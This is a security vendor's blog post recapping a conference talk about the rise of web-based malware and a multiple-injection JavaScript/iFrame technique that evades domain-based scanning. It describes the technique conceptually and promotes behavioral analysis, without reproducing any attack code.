Late last week I gave a talk at the Cyber Security East Conference in Washington, DC. Some of the other speakers included Robert Lentz (Deputy Assistant Secretary of Defense), Dr. Eric Cole (Chief Scientist of Lockheed Martin), and Robert Carey (Chief Information Officer, Department of the Navy). There was a lot of interesting and useful discussion, and I was glad to be able to contribute to the event.
In my talk, I reviewed the fundamental shift we've seen in the way malware is spreading, focusing on the 600% increase in web-based malware in the last two years. These attacks -- in which legitimate sites are compromised and turned into delivery vehicles for malware -- are impacting more than a million webpages per month, and in turn more and more legitimate sites are being blacklisted by major search engines, browsers, and AV companies.
I also shared a few examples of how web-based malware attacks are growing more sophisticated, based on data we've gathered in the last year using our proprietary malware analysis platform. As you may know, some web-based malware attacks can be attributed to a single injection of an iFrame or JavaScript code snippet, with a relatively obvious malicious domain in the SRC of the iFrame. Others employ heavily obfuscated JavaScript that can often be hundreds of characters long, and as such can be more difficult to spot or remove from an infected site -- but they still use a single injection point.
We are now starting to see attackers insert code via multiple injection points, to further obfuscate the bad code and make it more difficult for webmasters and traditional scans to detect. In the screen below is an example of this kind of attack that I presented last week:
Note that the attacker has injected JavaScript here, but it is not obfuscated, and it doesn't appear to point to a malicious domain. Hence, anyone who does a simple check for malicious domains may be easily fooled into thinking that the JavaScript is innocuous. The reality is quite different: The call to "getElementById" in the JavaScript reaches into another part of the document (where the first injection took place) to retrieve and clarify the malicious domain. Once the domain is decoded (in the second injection), the attacker's domain is revealed to be the source of a malicious iFrame.
This new attack makes it clear that the purveyors of web-based malware are actively looking for ways around malware scans, and it underlines the importance of going above and beyond signature-based analysis in the battle against this threat. For example, the Dasient WAM malware-analysis platform was able to proactively capture this new multiple-injection attack in no small part because of its strengths in behavioral analysis. We believe that as the web becomes more sophisticated and as attackers continue to embrace new, increasingly automated attack vectors, businesses on the web will need to deploy protections that work at web speed and web scale to keep themselves safe.
0 comments:
Post a Comment